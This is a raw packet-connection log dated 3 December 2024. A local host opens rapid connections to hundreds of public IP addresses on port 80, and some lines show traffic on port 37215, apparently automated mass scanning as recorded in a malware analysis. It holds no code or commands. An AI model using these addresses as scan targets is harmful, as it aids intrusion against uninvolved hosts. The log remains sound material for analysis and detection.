                                                Dec 3, 2024 22:16:50.816454887 CET6013680192.168.2.238.163.124.143
                                                Dec 3, 2024 22:16:50.816629887 CET8051882120.125.222.84192.168.2.23
                                                Dec 3, 2024 22:16:50.816669941 CET5188280192.168.2.23120.125.222.84
                                                Dec 3, 2024 22:16:50.817177057 CET8035922159.216.106.173192.168.2.23
                                                Dec 3, 2024 22:16:50.817212105 CET3592280192.168.2.23159.216.106.173
                                                Dec 3, 2024 22:16:50.820110083 CET3721557304197.132.62.119192.168.2.23
                                                Dec 3, 2024 22:16:50.820120096 CET3721539548156.81.76.10192.168.2.23
                                                Dec 3, 2024 22:16:50.820204973 CET3721542194197.26.74.237192.168.2.23
                                                Dec 3, 2024 22:16:50.820228100 CET372153337041.30.218.207192.168.2.23
                                                Dec 3, 2024 22:16:50.820277929 CET3721539518156.170.127.69192.168.2.23
                                                Dec 3, 2024 22:16:50.831520081 CET3721553450197.166.40.133192.168.2.23
                                                Dec 3, 2024 22:16:50.831530094 CET3721556452197.193.108.120192.168.2.23
                                                Dec 3, 2024 22:16:50.831563950 CET372153818841.7.124.25192.168.2.23
                                                Dec 3, 2024 22:16:50.863702059 CET3721539518156.170.127.69192.168.2.23
                                                Dec 3, 2024 22:16:50.863728046 CET372153337041.30.218.207192.168.2.23
                                                Dec 3, 2024 22:16:50.863737106 CET3721542194197.26.74.237192.168.2.23
                                                Dec 3, 2024 22:16:50.863744974 CET3721539548156.81.76.10192.168.2.23
                                                Dec 3, 2024 22:16:50.863754988 CET3721557304197.132.62.119192.168.2.23
                                                Dec 3, 2024 22:16:50.876687050 CET803748852.147.152.231192.168.2.23
                                                Dec 3, 2024 22:16:50.876800060 CET3748880192.168.2.2352.147.152.231
                                                Dec 3, 2024 22:16:50.877150059 CET805325083.119.82.146192.168.2.23
                                                Dec 3, 2024 22:16:50.877305031 CET5325080192.168.2.2383.119.82.146
                                                Dec 3, 2024 22:16:50.877324104 CET8038280208.170.5.222192.168.2.23
                                                Dec 3, 2024 22:16:50.877368927 CET3828080192.168.2.23208.170.5.222
                                                Dec 3, 2024 22:16:51.411783934 CET4483080192.168.2.2323.93.194.133
                                                Dec 3, 2024 22:16:51.411783934 CET4027680192.168.2.238.43.2.155
                                                Dec 3, 2024 22:16:51.411783934 CET3448280192.168.2.2364.69.46.207
                                                Dec 3, 2024 22:16:51.411798000 CET6017680192.168.2.2399.212.18.166
                                                Dec 3, 2024 22:16:51.411799908 CET3348880192.168.2.23125.111.75.105
                                                Dec 3, 2024 22:16:51.411803007 CET3476080192.168.2.23210.36.162.136
                                                Dec 3, 2024 22:16:51.411854029 CET3717680192.168.2.231.252.247.68
                                                Dec 3, 2024 22:16:51.443794966 CET5508680192.168.2.232.233.134.116
                                                Dec 3, 2024 22:16:51.443794966 CET4915480192.168.2.23107.229.45.191
                                                Dec 3, 2024 22:16:51.443798065 CET4013280192.168.2.23128.106.21.141
                                                Dec 3, 2024 22:16:51.443798065 CET5407280192.168.2.23194.18.61.94
                                                Dec 3, 2024 22:16:51.443798065 CET5642480192.168.2.23145.20.17.13
                                                Dec 3, 2024 22:16:51.443798065 CET3686480192.168.2.23159.157.188.52
                                                Dec 3, 2024 22:16:51.443798065 CET6008680192.168.2.23176.10.51.162
                                                Dec 3, 2024 22:16:51.443802118 CET3484880192.168.2.2373.104.148.95
                                                Dec 3, 2024 22:16:51.443802118 CET5539080192.168.2.23103.104.235.120
                                                Dec 3, 2024 22:16:51.443800926 CET3335280192.168.2.23213.75.138.155
                                                Dec 3, 2024 22:16:51.443802118 CET4161880192.168.2.23101.211.231.251
                                                Dec 3, 2024 22:16:51.443814039 CET4476280192.168.2.23201.157.7.217
                                                Dec 3, 2024 22:16:51.443820953 CET5182080192.168.2.23110.23.29.220
                                                Dec 3, 2024 22:16:51.443828106 CET4599480192.168.2.2393.104.201.65
                                                Dec 3, 2024 22:16:51.443841934 CET4100680192.168.2.2397.55.138.48
                                                Dec 3, 2024 22:16:51.443845034 CET4811680192.168.2.2354.6.47.124
                                                Dec 3, 2024 22:16:51.481770992 CET8036100148.77.50.206192.168.2.23
                                                Dec 3, 2024 22:16:51.481967926 CET3610080192.168.2.23148.77.50.206
                                                Dec 3, 2024 22:16:51.532789946 CET8033488125.111.75.105192.168.2.23
                                                Dec 3, 2024 22:16:51.532843113 CET806017699.212.18.166192.168.2.23
                                                Dec 3, 2024 22:16:51.532852888 CET804483023.93.194.133192.168.2.23
                                                Dec 3, 2024 22:16:51.532861948 CET8034760210.36.162.136192.168.2.23
                                                Dec 3, 2024 22:16:51.532883883 CET80402768.43.2.155192.168.2.23
                                                Dec 3, 2024 22:16:51.532893896 CET803448264.69.46.207192.168.2.23
                                                Dec 3, 2024 22:16:51.532906055 CET80371761.252.247.68192.168.2.23
                                                Dec 3, 2024 22:16:51.532922983 CET3348880192.168.2.23125.111.75.105
                                                Dec 3, 2024 22:16:51.532929897 CET6017680192.168.2.2399.212.18.166
                                                Dec 3, 2024 22:16:51.532937050 CET3476080192.168.2.23210.36.162.136
                                                Dec 3, 2024 22:16:51.532938004 CET4483080192.168.2.2323.93.194.133
                                                Dec 3, 2024 22:16:51.532938004 CET3448280192.168.2.2364.69.46.207
                                                Dec 3, 2024 22:16:51.532938004 CET4027680192.168.2.238.43.2.155
                                                Dec 3, 2024 22:16:51.532972097 CET3717680192.168.2.231.252.247.68
                                                Dec 3, 2024 22:16:51.533030987 CET3770780192.168.2.23128.160.146.62
                                                Dec 3, 2024 22:16:51.533034086 CET3770780192.168.2.23175.136.0.206
                                                Dec 3, 2024 22:16:51.533035994 CET3770780192.168.2.2358.233.196.220
                                                Dec 3, 2024 22:16:51.533040047 CET3770780192.168.2.23138.190.218.64
                                                Dec 3, 2024 22:16:51.533042908 CET3770780192.168.2.2317.188.107.76
                                                Dec 3, 2024 22:16:51.533046007 CET3770780192.168.2.2313.37.13.251
                                                Dec 3, 2024 22:16:51.533046007 CET3770780192.168.2.2357.247.150.105
                                                Dec 3, 2024 22:16:51.533056974 CET3770780192.168.2.2376.165.243.2
                                                Dec 3, 2024 22:16:51.533056974 CET3770780192.168.2.2339.158.171.31
                                                Dec 3, 2024 22:16:51.533060074 CET3770780192.168.2.23192.18.96.173
                                                Dec 3, 2024 22:16:51.533058882 CET3770780192.168.2.23186.113.80.73
                                                Dec 3, 2024 22:16:51.533060074 CET3770780192.168.2.2340.210.155.2
                                                Dec 3, 2024 22:16:51.533063889 CET3770780192.168.2.2398.62.217.116
                                                Dec 3, 2024 22:16:51.533067942 CET3770780192.168.2.23143.95.246.74
                                                Dec 3, 2024 22:16:51.533067942 CET3770780192.168.2.23121.148.192.123
                                                Dec 3, 2024 22:16:51.533067942 CET3770780192.168.2.23104.124.112.193
                                                Dec 3, 2024 22:16:51.533073902 CET3770780192.168.2.23223.121.225.70
                                                Dec 3, 2024 22:16:51.533075094 CET3770780192.168.2.23206.227.56.7
                                                Dec 3, 2024 22:16:51.533073902 CET3770780192.168.2.23218.52.101.220
                                                Dec 3, 2024 22:16:51.533081055 CET3770780192.168.2.23143.144.238.248
                                                Dec 3, 2024 22:16:51.533081055 CET3770780192.168.2.23207.6.169.4
                                                Dec 3, 2024 22:16:51.533081055 CET3770780192.168.2.2364.59.135.200
                                                Dec 3, 2024 22:16:51.533081055 CET3770780192.168.2.23150.244.142.161
                                                Dec 3, 2024 22:16:51.533085108 CET3770780192.168.2.23120.198.118.153
                                                Dec 3, 2024 22:16:51.533085108 CET3770780192.168.2.2379.199.171.78
                                                Dec 3, 2024 22:16:51.533088923 CET3770780192.168.2.23183.28.92.158
                                                Dec 3, 2024 22:16:51.533097029 CET3770780192.168.2.2339.44.135.78
                                                Dec 3, 2024 22:16:51.533106089 CET3770780192.168.2.23121.253.73.189
                                                Dec 3, 2024 22:16:51.533107042 CET3770780192.168.2.2378.142.26.92
                                                Dec 3, 2024 22:16:51.533107042 CET3770780192.168.2.23193.238.40.164
                                                Dec 3, 2024 22:16:51.533107042 CET3770780192.168.2.23152.45.45.238
                                                Dec 3, 2024 22:16:51.533108950 CET3770780192.168.2.2334.232.155.108
                                                Dec 3, 2024 22:16:51.533112049 CET3770780192.168.2.23148.72.231.18
                                                Dec 3, 2024 22:16:51.533112049 CET3770780192.168.2.2360.254.185.199
                                                Dec 3, 2024 22:16:51.533114910 CET3770780192.168.2.2363.233.16.98
                                                Dec 3, 2024 22:16:51.533127069 CET3770780192.168.2.2390.130.74.93
                                                Dec 3, 2024 22:16:51.533129930 CET3770780192.168.2.2370.246.26.77
                                                Dec 3, 2024 22:16:51.533132076 CET3770780192.168.2.23210.159.47.47
                                                Dec 3, 2024 22:16:51.533147097 CET3770780192.168.2.2371.39.118.187
                                                Dec 3, 2024 22:16:51.533149958 CET3770780192.168.2.23159.132.35.218
                                                Dec 3, 2024 22:16:51.533149958 CET3770780192.168.2.23134.76.21.179
                                                Dec 3, 2024 22:16:51.533162117 CET3770780192.168.2.23118.92.116.31
                                                Dec 3, 2024 22:16:51.533169031 CET3770780192.168.2.234.155.227.248
                                                Dec 3, 2024 22:16:51.533169031 CET3770780192.168.2.2346.96.134.251
                                                Dec 3, 2024 22:16:51.533169031 CET3770780192.168.2.23157.179.137.136
                                                Dec 3, 2024 22:16:51.533169031 CET3770780192.168.2.23175.106.22.71
                                                Dec 3, 2024 22:16:51.533169031 CET3770780192.168.2.2346.72.44.235
                                                Dec 3, 2024 22:16:51.533170938 CET3770780192.168.2.23171.27.195.82
                                                Dec 3, 2024 22:16:51.533181906 CET3770780192.168.2.23200.98.99.254
                                                Dec 3, 2024 22:16:51.533186913 CET3770780192.168.2.23129.37.9.102
                                                Dec 3, 2024 22:16:51.533194065 CET3770780192.168.2.2336.154.130.46
                                                Dec 3, 2024 22:16:51.533194065 CET3770780192.168.2.23136.240.205.73
                                                Dec 3, 2024 22:16:51.533195972 CET3770780192.168.2.23173.176.117.13
                                                Dec 3, 2024 22:16:51.533196926 CET3770780192.168.2.23211.28.212.81
                                                Dec 3, 2024 22:16:51.533200979 CET3770780192.168.2.23178.212.220.26
                                                Dec 3, 2024 22:16:51.533202887 CET3770780192.168.2.2378.206.124.69
                                                Dec 3, 2024 22:16:51.533204079 CET3770780192.168.2.23116.204.202.129
                                                Dec 3, 2024 22:16:51.533216000 CET3770780192.168.2.2318.59.250.35
                                                Dec 3, 2024 22:16:51.533222914 CET3770780192.168.2.23116.216.114.6
                                                Dec 3, 2024 22:16:51.533227921 CET3770780192.168.2.23189.147.217.224
                                                Dec 3, 2024 22:16:51.533231020 CET3770780192.168.2.23174.180.202.76
                                                Dec 3, 2024 22:16:51.533236980 CET3770780192.168.2.23191.228.77.210
                                                Dec 3, 2024 22:16:51.533242941 CET3770780192.168.2.23111.132.24.164
                                                Dec 3, 2024 22:16:51.533253908 CET3770780192.168.2.23136.203.33.101
                                                Dec 3, 2024 22:16:51.533257961 CET3770780192.168.2.2359.99.51.115
                                                Dec 3, 2024 22:16:51.533260107 CET3770780192.168.2.2371.198.29.201
                                                Dec 3, 2024 22:16:51.533262014 CET3770780192.168.2.23153.60.239.205
                                                Dec 3, 2024 22:16:51.533274889 CET3770780192.168.2.23162.215.95.172
                                                Dec 3, 2024 22:16:51.533282042 CET3770780192.168.2.2375.245.190.199
                                                Dec 3, 2024 22:16:51.533282995 CET3770780192.168.2.23112.216.131.112
                                                Dec 3, 2024 22:16:51.533283949 CET3770780192.168.2.23170.198.117.140
                                                Dec 3, 2024 22:16:51.533284903 CET3770780192.168.2.23186.88.84.58
                                                Dec 3, 2024 22:16:51.533287048 CET3770780192.168.2.2367.26.30.105
                                                Dec 3, 2024 22:16:51.533287048 CET3770780192.168.2.23133.107.101.43
                                                Dec 3, 2024 22:16:51.533287048 CET3770780192.168.2.2364.0.39.98
                                                Dec 3, 2024 22:16:51.533288956 CET3770780192.168.2.23223.111.27.135
                                                Dec 3, 2024 22:16:51.533288956 CET3770780192.168.2.23160.33.28.9
                                                Dec 3, 2024 22:16:51.533310890 CET3770780192.168.2.2390.137.55.81
                                                Dec 3, 2024 22:16:51.533310890 CET3770780192.168.2.2392.224.90.194
                                                Dec 3, 2024 22:16:51.533312082 CET3770780192.168.2.23136.227.236.148
                                                Dec 3, 2024 22:16:51.533313036 CET3770780192.168.2.23204.68.89.242
                                                Dec 3, 2024 22:16:51.533313990 CET3770780192.168.2.2354.248.53.240
                                                Dec 3, 2024 22:16:51.533327103 CET3770780192.168.2.2336.123.95.116
                                                Dec 3, 2024 22:16:51.533334970 CET3770780192.168.2.23153.119.74.51
                                                Dec 3, 2024 22:16:51.533334970 CET3770780192.168.2.23121.107.236.157
                                                Dec 3, 2024 22:16:51.533334970 CET3770780192.168.2.2348.137.206.164
                                                Dec 3, 2024 22:16:51.533334970 CET3770780192.168.2.23155.135.23.211
                                                Dec 3, 2024 22:16:51.533337116 CET3770780192.168.2.23158.250.215.118
                                                Dec 3, 2024 22:16:51.533339977 CET3770780192.168.2.2387.172.31.18
                                                Dec 3, 2024 22:16:51.533339977 CET3770780192.168.2.23221.182.211.74
                                                Dec 3, 2024 22:16:51.533354044 CET3770780192.168.2.23117.242.41.141
                                                Dec 3, 2024 22:16:51.533358097 CET3770780192.168.2.2392.5.187.228
                                                Dec 3, 2024 22:16:51.533361912 CET3770780192.168.2.2313.3.4.212
                                                Dec 3, 2024 22:16:51.533364058 CET3770780192.168.2.2360.126.116.108
                                                Dec 3, 2024 22:16:51.533365011 CET3770780192.168.2.2314.237.30.105
                                                Dec 3, 2024 22:16:51.533365011 CET3770780192.168.2.23163.137.145.22
                                                Dec 3, 2024 22:16:51.533368111 CET3770780192.168.2.23202.200.17.62
                                                Dec 3, 2024 22:16:51.533371925 CET3770780192.168.2.23132.167.104.137
                                                Dec 3, 2024 22:16:51.533375025 CET3770780192.168.2.23141.217.235.207
                                                Dec 3, 2024 22:16:51.533379078 CET3770780192.168.2.2363.171.63.84
                                                Dec 3, 2024 22:16:51.533380032 CET3770780192.168.2.23180.219.94.65
                                                Dec 3, 2024 22:16:51.533381939 CET3770780192.168.2.2354.26.212.54
                                                Dec 3, 2024 22:16:51.533385992 CET3770780192.168.2.23147.62.60.111
                                                Dec 3, 2024 22:16:51.533395052 CET3770780192.168.2.23182.167.214.64
                                                Dec 3, 2024 22:16:51.533411980 CET3770780192.168.2.23219.131.222.125
                                                Dec 3, 2024 22:16:51.533413887 CET3770780192.168.2.23113.235.136.147
                                                Dec 3, 2024 22:16:51.533413887 CET3770780192.168.2.2327.128.203.194
                                                Dec 3, 2024 22:16:51.533413887 CET3770780192.168.2.23139.113.136.110
                                                Dec 3, 2024 22:16:51.533416986 CET3770780192.168.2.2386.164.43.11
                                                Dec 3, 2024 22:16:51.533423901 CET3770780192.168.2.23131.183.95.55
                                                Dec 3, 2024 22:16:51.533431053 CET3770780192.168.2.2372.206.154.249
                                                Dec 3, 2024 22:16:51.533432961 CET3770780192.168.2.23171.248.255.254
                                                Dec 3, 2024 22:16:51.533433914 CET3770780192.168.2.23163.103.245.156
                                                Dec 3, 2024 22:16:51.533433914 CET3770780192.168.2.23101.216.22.226
                                                Dec 3, 2024 22:16:51.533435106 CET3770780192.168.2.23146.17.191.106
                                                Dec 3, 2024 22:16:51.533441067 CET3770780192.168.2.23100.186.151.126
                                                Dec 3, 2024 22:16:51.533443928 CET3770780192.168.2.2367.89.10.193
                                                Dec 3, 2024 22:16:51.533443928 CET3770780192.168.2.2358.54.198.187
                                                Dec 3, 2024 22:16:51.533456087 CET3770780192.168.2.23193.157.255.195
                                                Dec 3, 2024 22:16:51.533456087 CET3770780192.168.2.2344.169.130.129
                                                Dec 3, 2024 22:16:51.533456087 CET3770780192.168.2.2347.244.37.163
                                                Dec 3, 2024 22:16:51.533456087 CET3770780192.168.2.2383.152.187.175
                                                Dec 3, 2024 22:16:51.533458948 CET3770780192.168.2.23201.241.251.73
                                                Dec 3, 2024 22:16:51.533458948 CET3770780192.168.2.23159.66.150.155
                                                Dec 3, 2024 22:16:51.533459902 CET3770780192.168.2.2346.152.117.174
                                                Dec 3, 2024 22:16:51.533458948 CET3770780192.168.2.2344.68.228.179
                                                Dec 3, 2024 22:16:51.533458948 CET3770780192.168.2.2346.104.7.248
                                                Dec 3, 2024 22:16:51.533461094 CET3770780192.168.2.2323.197.231.60
                                                Dec 3, 2024 22:16:51.533467054 CET3770780192.168.2.232.24.194.35
                                                Dec 3, 2024 22:16:51.533467054 CET3770780192.168.2.23195.209.184.223
                                                Dec 3, 2024 22:16:51.533468008 CET3770780192.168.2.23142.18.158.67
                                                Dec 3, 2024 22:16:51.533468008 CET3770780192.168.2.23142.133.37.237
                                                Dec 3, 2024 22:16:51.533468008 CET3770780192.168.2.23181.223.49.65
                                                Dec 3, 2024 22:16:51.533468008 CET3770780192.168.2.23117.85.153.92
                                                Dec 3, 2024 22:16:51.533468008 CET3770780192.168.2.23120.8.213.221
                                                Dec 3, 2024 22:16:51.533471107 CET3770780192.168.2.23155.130.91.12
                                                Dec 3, 2024 22:16:51.533488035 CET3770780192.168.2.2380.82.43.158
                                                Dec 3, 2024 22:16:51.533488035 CET3770780192.168.2.23103.137.96.60
                                                Dec 3, 2024 22:16:51.533490896 CET3770780192.168.2.23189.241.64.93
                                                Dec 3, 2024 22:16:51.533493042 CET3770780192.168.2.23112.19.19.232
                                                Dec 3, 2024 22:16:51.533493042 CET3770780192.168.2.23178.22.242.118
                                                Dec 3, 2024 22:16:51.533495903 CET3770780192.168.2.23123.116.66.130
                                                Dec 3, 2024 22:16:51.533495903 CET3770780192.168.2.23171.77.80.136
                                                Dec 3, 2024 22:16:51.533499956 CET3770780192.168.2.23165.31.3.48
                                                Dec 3, 2024 22:16:51.533499956 CET3770780192.168.2.2399.37.158.165
                                                Dec 3, 2024 22:16:51.533500910 CET3770780192.168.2.2359.87.196.238
                                                Dec 3, 2024 22:16:51.533499956 CET3770780192.168.2.2372.152.16.100
                                                Dec 3, 2024 22:16:51.533500910 CET3770780192.168.2.23207.246.202.31
                                                Dec 3, 2024 22:16:51.533504009 CET3770780192.168.2.23139.93.224.238
                                                Dec 3, 2024 22:16:51.533504009 CET3770780192.168.2.23129.225.196.107
                                                Dec 3, 2024 22:16:51.533504009 CET3770780192.168.2.23120.172.93.172
                                                Dec 3, 2024 22:16:51.533509016 CET3770780192.168.2.23208.87.247.34
                                                Dec 3, 2024 22:16:51.533510923 CET3770780192.168.2.23152.62.182.72
                                                Dec 3, 2024 22:16:51.533524036 CET3770780192.168.2.23147.170.77.224
                                                Dec 3, 2024 22:16:51.533524036 CET3770780192.168.2.23176.33.2.225
                                                Dec 3, 2024 22:16:51.533524036 CET3770780192.168.2.23161.48.89.4
                                                Dec 3, 2024 22:16:51.533524036 CET3770780192.168.2.23162.187.147.115
                                                Dec 3, 2024 22:16:51.533528090 CET3770780192.168.2.2338.228.81.147
                                                Dec 3, 2024 22:16:51.533528090 CET3770780192.168.2.23133.74.226.16
                                                Dec 3, 2024 22:16:51.533528090 CET3770780192.168.2.23182.79.131.54
                                                Dec 3, 2024 22:16:51.533528090 CET3770780192.168.2.2373.44.158.57
                                                Dec 3, 2024 22:16:51.533529997 CET3770780192.168.2.23213.239.86.34
                                                Dec 3, 2024 22:16:51.533530951 CET3770780192.168.2.2348.154.160.198
                                                Dec 3, 2024 22:16:51.533530951 CET3770780192.168.2.23202.136.140.158
                                                Dec 3, 2024 22:16:51.533533096 CET3770780192.168.2.23204.51.1.228
                                                Dec 3, 2024 22:16:51.533530951 CET3770780192.168.2.2398.227.190.123
                                                Dec 3, 2024 22:16:51.533530951 CET3770780192.168.2.2393.154.114.10
                                                Dec 3, 2024 22:16:51.533530951 CET3770780192.168.2.23210.133.130.166
                                                Dec 3, 2024 22:16:51.533529997 CET3770780192.168.2.23175.1.114.210
                                                Dec 3, 2024 22:16:51.533533096 CET3770780192.168.2.2342.60.23.166
                                                Dec 3, 2024 22:16:51.533530951 CET3770780192.168.2.23159.230.204.205
                                                Dec 3, 2024 22:16:51.533529997 CET3770780192.168.2.23136.128.12.12
                                                Dec 3, 2024 22:16:51.533530951 CET3770780192.168.2.2374.44.51.45
                                                Dec 3, 2024 22:16:51.533530951 CET3770780192.168.2.23103.6.237.154
                                                Dec 3, 2024 22:16:51.533555031 CET3770780192.168.2.23115.221.190.119
                                                Dec 3, 2024 22:16:51.533555031 CET3770780192.168.2.2320.203.138.123
                                                Dec 3, 2024 22:16:51.533555031 CET3770780192.168.2.23144.186.101.238
                                                Dec 3, 2024 22:16:51.533555984 CET3770780192.168.2.2363.51.38.32
                                                Dec 3, 2024 22:16:51.533555984 CET3770780192.168.2.2344.39.218.50
                                                Dec 3, 2024 22:16:51.533555984 CET3770780192.168.2.23122.65.189.21
                                                Dec 3, 2024 22:16:51.533564091 CET3770780192.168.2.23122.204.56.91
                                                Dec 3, 2024 22:16:51.533564091 CET3770780192.168.2.2340.231.225.230
                                                Dec 3, 2024 22:16:51.533565998 CET3770780192.168.2.2368.3.27.86
                                                Dec 3, 2024 22:16:51.533565998 CET3770780192.168.2.23160.86.218.109
                                                Dec 3, 2024 22:16:51.533565998 CET3770780192.168.2.23203.142.125.247
                                                Dec 3, 2024 22:16:51.533566952 CET3770780192.168.2.2317.161.206.164
                                                Dec 3, 2024 22:16:51.533569098 CET3770780192.168.2.23195.8.141.249
                                                Dec 3, 2024 22:16:51.533565998 CET3770780192.168.2.23199.143.40.213
                                                Dec 3, 2024 22:16:51.533569098 CET3770780192.168.2.23191.58.30.72
                                                Dec 3, 2024 22:16:51.533565998 CET3770780192.168.2.23125.140.178.80
                                                Dec 3, 2024 22:16:51.533569098 CET3770780192.168.2.2348.204.138.30
                                                Dec 3, 2024 22:16:51.533569098 CET3770780192.168.2.23158.217.116.6
                                                Dec 3, 2024 22:16:51.533569098 CET3770780192.168.2.23130.232.185.213
                                                Dec 3, 2024 22:16:51.533582926 CET3770780192.168.2.23189.27.92.188
                                                Dec 3, 2024 22:16:51.533582926 CET3770780192.168.2.23212.41.82.144
                                                Dec 3, 2024 22:16:51.533582926 CET3770780192.168.2.23190.51.0.158
                                                Dec 3, 2024 22:16:51.533585072 CET3770780192.168.2.2347.141.202.86
                                                Dec 3, 2024 22:16:51.533585072 CET3770780192.168.2.23188.247.87.132
                                                Dec 3, 2024 22:16:51.533588886 CET3770780192.168.2.23207.181.142.213
                                                Dec 3, 2024 22:16:51.533588886 CET3770780192.168.2.2364.210.63.96
                                                Dec 3, 2024 22:16:51.533588886 CET3770780192.168.2.23174.189.25.92
                                                Dec 3, 2024 22:16:51.533590078 CET3770780192.168.2.23109.135.182.140
                                                Dec 3, 2024 22:16:51.533590078 CET3770780192.168.2.2371.210.217.69
                                                Dec 3, 2024 22:16:51.533590078 CET3770780192.168.2.2393.173.66.250
                                                Dec 3, 2024 22:16:51.533590078 CET3770780192.168.2.23126.147.61.126
                                                Dec 3, 2024 22:16:51.533595085 CET3770780192.168.2.23172.208.200.87
                                                Dec 3, 2024 22:16:51.533595085 CET3770780192.168.2.23169.200.173.21
                                                Dec 3, 2024 22:16:51.533596992 CET3770780192.168.2.2324.252.70.156
                                                Dec 3, 2024 22:16:51.533598900 CET3770780192.168.2.2351.253.210.46
                                                Dec 3, 2024 22:16:51.533598900 CET3770780192.168.2.23210.125.18.198
                                                Dec 3, 2024 22:16:51.533598900 CET3770780192.168.2.23114.207.218.98
                                                Dec 3, 2024 22:16:51.533598900 CET3770780192.168.2.23184.157.17.73
                                                Dec 3, 2024 22:16:51.533600092 CET3770780192.168.2.23123.98.253.250
                                                Dec 3, 2024 22:16:51.533600092 CET3770780192.168.2.23137.100.133.86
                                                Dec 3, 2024 22:16:51.533600092 CET3770780192.168.2.23187.239.161.125
                                                Dec 3, 2024 22:16:51.533600092 CET3770780192.168.2.23112.134.172.143
                                                Dec 3, 2024 22:16:51.533600092 CET3770780192.168.2.23135.8.195.155
                                                Dec 3, 2024 22:16:51.533620119 CET3770780192.168.2.23148.43.152.125
                                                Dec 3, 2024 22:16:51.533620119 CET3770780192.168.2.23106.84.4.6
                                                Dec 3, 2024 22:16:51.533620119 CET3770780192.168.2.231.166.102.242
                                                Dec 3, 2024 22:16:51.533623934 CET3770780192.168.2.2324.74.115.177
                                                Dec 3, 2024 22:16:51.533623934 CET3770780192.168.2.2382.88.98.119
                                                Dec 3, 2024 22:16:51.533623934 CET3770780192.168.2.23197.202.134.207
                                                Dec 3, 2024 22:16:51.533623934 CET3770780192.168.2.23219.194.124.163
                                                Dec 3, 2024 22:16:51.533623934 CET3770780192.168.2.23216.107.250.203
                                                Dec 3, 2024 22:16:51.533623934 CET3770780192.168.2.23137.1.106.51
                                                Dec 3, 2024 22:16:51.533626080 CET3770780192.168.2.23216.238.164.237
                                                Dec 3, 2024 22:16:51.533626080 CET3770780192.168.2.2341.24.198.146
                                                Dec 3, 2024 22:16:51.533626080 CET3770780192.168.2.2349.173.242.234
                                                Dec 3, 2024 22:16:51.533627033 CET3770780192.168.2.235.66.234.74
                                                Dec 3, 2024 22:16:51.533627987 CET3770780192.168.2.23102.221.240.92
                                                Dec 3, 2024 22:16:51.533627987 CET3770780192.168.2.23150.5.81.152
                                                Dec 3, 2024 22:16:51.533626080 CET3770780192.168.2.232.32.82.110
                                                Dec 3, 2024 22:16:51.533627033 CET3770780192.168.2.23207.31.123.65
                                                Dec 3, 2024 22:16:51.533627987 CET3770780192.168.2.23192.188.96.188
                                                Dec 3, 2024 22:16:51.533631086 CET3770780192.168.2.2376.84.153.216
                                                Dec 3, 2024 22:16:51.533627987 CET3770780192.168.2.23152.191.6.183
                                                Dec 3, 2024 22:16:51.533631086 CET3770780192.168.2.23117.252.226.183
                                                Dec 3, 2024 22:16:51.533631086 CET3770780192.168.2.23123.166.34.131
                                                Dec 3, 2024 22:16:51.533631086 CET3770780192.168.2.23173.149.220.180
                                                Dec 3, 2024 22:16:51.533631086 CET3770780192.168.2.2395.157.157.222
                                                Dec 3, 2024 22:16:51.533631086 CET3770780192.168.2.23155.124.62.79
                                                Dec 3, 2024 22:16:51.533631086 CET3770780192.168.2.23129.130.139.214
                                                Dec 3, 2024 22:16:51.533647060 CET3770780192.168.2.2371.150.113.77
                                                Dec 3, 2024 22:16:51.533647060 CET3770780192.168.2.23165.128.255.124
                                                Dec 3, 2024 22:16:51.533648014 CET3770780192.168.2.2320.93.231.107
                                                Dec 3, 2024 22:16:51.533648968 CET3770780192.168.2.23152.152.200.76
                                                Dec 3, 2024 22:16:51.533648014 CET3770780192.168.2.23206.252.101.188
                                                Dec 3, 2024 22:16:51.533648968 CET3770780192.168.2.23217.8.142.82
                                                Dec 3, 2024 22:16:51.533649921 CET3770780192.168.2.23217.12.105.131
                                                Dec 3, 2024 22:16:51.533649921 CET3770780192.168.2.2332.72.104.158
                                                Dec 3, 2024 22:16:51.533651114 CET3770780192.168.2.23202.153.210.198
                                                Dec 3, 2024 22:16:51.533651114 CET3770780192.168.2.234.48.145.102
                                                Dec 3, 2024 22:16:51.533651114 CET3770780192.168.2.2334.96.37.217
                                                Dec 3, 2024 22:16:51.533652067 CET3770780192.168.2.23146.185.180.28
                                                Dec 3, 2024 22:16:51.533651114 CET3770780192.168.2.2399.115.109.190
                                                Dec 3, 2024 22:16:51.533652067 CET3770780192.168.2.23156.190.118.125
                                                Dec 3, 2024 22:16:51.533651114 CET3770780192.168.2.23156.8.46.106
                                                Dec 3, 2024 22:16:51.533651114 CET3770780192.168.2.23197.68.183.85
                                                Dec 3, 2024 22:16:51.533652067 CET3770780192.168.2.2392.67.73.34
                                                Dec 3, 2024 22:16:51.533651114 CET3770780192.168.2.23197.61.218.106
                                                Dec 3, 2024 22:16:51.533652067 CET3770780192.168.2.23193.135.195.53
                                                Dec 3, 2024 22:16:51.533653975 CET3770780192.168.2.23174.90.103.180
                                                Dec 3, 2024 22:16:51.533653975 CET3770780192.168.2.23221.20.25.72
                                                Dec 3, 2024 22:16:51.533653975 CET3770780192.168.2.23134.61.35.113
                                                Dec 3, 2024 22:16:51.533664942 CET3770780192.168.2.2367.52.198.198
                                                Dec 3, 2024 22:16:51.533664942 CET3770780192.168.2.23111.156.127.193
                                                Dec 3, 2024 22:16:51.533664942 CET3770780192.168.2.23109.212.207.2
                                                Dec 3, 2024 22:16:51.533667088 CET3770780192.168.2.23153.45.133.231
                                                Dec 3, 2024 22:16:51.533668995 CET3770780192.168.2.23190.190.153.91
                                                Dec 3, 2024 22:16:51.533668995 CET3770780192.168.2.23161.109.62.8
                                                Dec 3, 2024 22:16:51.533668995 CET3770780192.168.2.2341.26.21.28
                                                Dec 3, 2024 22:16:51.533673048 CET3770780192.168.2.2396.26.119.74
                                                Dec 3, 2024 22:16:51.533673048 CET3770780192.168.2.234.215.238.179
                                                Dec 3, 2024 22:16:51.533677101 CET3770780192.168.2.23192.34.112.79
                                                Dec 3, 2024 22:16:51.533677101 CET3770780192.168.2.23166.91.197.7
                                                Dec 3, 2024 22:16:51.533678055 CET3770780192.168.2.23139.8.178.236
                                                Dec 3, 2024 22:16:51.533677101 CET3770780192.168.2.23169.128.205.45
                                                Dec 3, 2024 22:16:51.533678055 CET3770780192.168.2.238.233.14.114
                                                Dec 3, 2024 22:16:51.533678055 CET3770780192.168.2.23174.209.198.242
                                                Dec 3, 2024 22:16:51.533678055 CET3770780192.168.2.2387.53.24.246
                                                Dec 3, 2024 22:16:51.533691883 CET3770780192.168.2.2365.42.82.120
                                                Dec 3, 2024 22:16:51.533691883 CET3770780192.168.2.23211.235.227.212
                                                Dec 3, 2024 22:16:51.533691883 CET3770780192.168.2.2341.226.16.40
                                                Dec 3, 2024 22:16:51.533693075 CET3770780192.168.2.2373.218.192.252
                                                Dec 3, 2024 22:16:51.533693075 CET3770780192.168.2.23174.189.150.74
